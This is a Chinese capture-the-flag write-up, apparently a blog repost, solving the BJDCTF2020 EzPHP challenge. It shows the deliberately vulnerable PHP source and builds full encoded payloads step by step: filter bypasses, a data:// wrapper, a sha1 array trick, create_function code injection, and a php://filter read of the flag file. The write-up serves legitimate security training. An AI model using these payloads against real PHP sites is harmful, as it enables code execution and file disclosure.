[BJDCTF2020]EzPHP php绕过 creat_function注入

[BJDCTF2020]EzPHP

<?php
highlight_file(__FILE__);
error_reporting(0); 

$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';

echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";

if($_SERVER) {
    
     
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

if (!preg_match('/http|https/i', $_GET['file'])) {
    
    
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
    
     
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!<br>";
    } 
} else die('fxck you! What do you want to do ?!');

if($_REQUEST) {
    
     
    foreach($_REQUEST as $value) {
    
     
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
} 

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");


if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    
    
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?<br>";
} else{
    
    
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
    
     
    die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else {
    
     
    include "flag.php";
    $code('', $arg); 
} ?>

要绕过很多匹配,Server[QUERY_STRING]可以理解成GET方法附在URL后面的参数,用URL编码可以绕过。

if($_SERVER) {
    
     
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

在这里插入图片描述
preg_match只匹配第一行,句尾加上换行符%0a进行绕过。file不能有http和https,用php伪协议的input或者data伪协议都可以。

if (!preg_match('/http|https/i', $_GET['file'])) {
    
    
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
    
     
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!<br>";
    } 
} else die('fxck you! What do you want to do ?!');

$_REQUEST包括GET和POST,检查这两个传进来的参数有没有字母和数字。应该可以用取反或者异或绕过,但这里用这个就太麻烦了。方式接收请求是存在优先级别的,如果同时接受GET和POST的数据,默认情况下POST具有优先权,所以POST相同的参数(debu,file)即可。

if($_REQUEST) {
    
     
    foreach($_REQUEST as $value) {
    
     
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
} 

用dta伪协议,file=data://text/plain,debu_debu_aqua

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");

注意这里是弱等于===,sha1的参数是数组会报错返回false,所以只要shana和passwd都是数组就行了

if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    
    
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?<br>";
} else{
    
    
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

前面这些合起来:

?file=data://text/plain,debu_debu_aqua&debu=aqua_is_cute
&shana[]=1&passwd[]=2

URL编码一下,同时POST file=1&debu=1

?file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0A&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2

构造flag[code]=create_function&flag[arg]=}var_dump(get_defined_vars());//
get_defined_vars()输出所有变量和值
base64编码后加在之前的payload之后

&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&%66%6c%61%67%5b%61%72%67%5d=}%76%61%72%5f%64%75%6d%70(%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73());//

在这里插入图片描述

现在我们知道了flag在fl4g.php中
用require代替include包含,替换掉刚刚的get_defined_vars()

require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php)

URL编码后:

require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f))

这整个一长串base64解码得到flag
在这里插入图片描述

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/scrawman/article/details/121597622